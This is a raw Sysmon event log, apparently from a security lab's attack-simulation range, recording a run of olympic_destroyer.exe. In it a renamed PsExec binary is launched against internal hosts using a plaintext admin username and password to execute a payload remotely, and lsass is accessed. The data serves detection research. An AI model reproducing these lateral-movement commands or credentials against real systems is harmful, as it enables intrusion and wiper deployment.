10:56:48.968{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F0-6216-9B05-000000003802}5188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.946{C8EA50B7-12F0-6216-9905-000000003802}7128C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 13241300x8000000000000000291416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:48.930{C8EA50B7-12F0-6216-9905-000000003802}7128C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.899{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F0-6216-9A05-000000003802}6804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.899{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F0-6216-9A05-000000003802}6804C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.899{C8EA50B7-12F0-6216-9A05-000000003802}68042424C:\Windows\system32\conhost.exe{C8EA50B7-12F0-6216-9905-000000003802}7128C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.868{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F0-6216-9A05-000000003802}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.868{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F0-6216-9A05-000000003802}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217699Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:48.323{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F213FF10CB5BBDCF4DC5B01B43C21408,SHA256=00B89225F9019A9860F63A41C1E40134FBAD87CCC7CA2D7EEE3F32CA077BB4B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.763{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.763{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.763{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.762{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.746{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F0-6216-9905-000000003802}7128C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.746{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12F0-6216-9905-000000003802}7128C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.751{C8EA50B7-12F0-6216-9905-000000003802}7128C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.746{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F0-6216-9905-000000003802}7128C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.746{C8EA50B7-12F0-6216-9705-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 13241300x8000000000000000291401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:48.715{C8EA50B7-12F0-6216-9705-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.683{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F0-6216-9805-000000003802}3152C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.683{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F0-6216-9805-000000003802}3152C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.683{C8EA50B7-12F0-6216-9805-000000003802}31527156C:\Windows\system32\conhost.exe{C8EA50B7-12F0-6216-9705-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.663{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F0-6216-9805-000000003802}3152C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.646{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F0-6216-9805-000000003802}3152C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.530{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F0-6216-9705-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.530{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12F0-6216-9705-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.532{C8EA50B7-12F0-6216-9705-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-255.eu-central-1.compute.internal -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.530{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F0-6216-9705-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.514{C8EA50B7-12F0-6216-9405-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.514{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F0-6216-9405-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.514{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F0-6216-9405-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:48.498{C8EA50B7-12F0-6216-9405-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 